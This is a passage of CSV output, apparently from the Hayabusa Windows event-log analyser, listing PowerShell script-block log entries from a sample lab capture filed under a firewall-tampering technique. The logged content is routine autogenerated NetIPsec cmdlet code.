[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Paramet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall 
rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = 
${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
